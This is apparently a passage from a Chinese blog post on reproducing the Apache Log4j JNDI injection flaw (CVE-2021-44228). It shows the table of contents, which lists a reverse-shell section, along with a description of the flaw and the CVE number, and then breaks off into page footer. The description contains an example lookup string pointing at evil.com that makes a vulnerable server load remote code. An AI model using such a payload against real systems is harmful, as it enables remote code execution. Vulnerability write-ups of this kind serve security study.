您当前的位置: 首页 >  apache

星球守护者

暂无认证

  • 1浏览

    0关注

    641博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

Apache Log4j-漏洞复现(CVE-2021-44228)

星球守护者 发布时间:2021-12-22 20:46:51 ,浏览量:1

文章目录
      • 漏洞描述
      • 漏洞编号
      • 影响范围
      • FOFA
      • 环境搭建
      • 漏洞复现
      • 漏洞复现-反弹shell
      • 参考连接
      • 摘抄

漏洞描述
  • Apache Log4j 是 Apache 的一个开源项目,Apache Log4j2是一个基于Java的日志记录工具
  • 该工具重写了Log4j框架,并且引入了大量丰富的特性。
  • 我们可以控制日志信息输送的目的地为控制台、文件、GUI组件等,通过定义每一条日志信息的级别,能够更加细致地控制日志的生成过程。
  • 该日志框架被大量用于业务系统开发,用来记录日志信息
  • Apace在其2.0到2.14.1版本中存在一处JNDI注入漏洞,攻击者在可以控制日志内容的情况下,通过传入类似于${jndi:ldap://evil.com/example}的lookup用于进行JNDI注入,执行任意代码。
漏洞编号
  • CVE-2021-44228
影响范围
  • log4
关注
打赏
1662051426
查看更多评论
立即登录/注册

微信扫码登录

0.0402s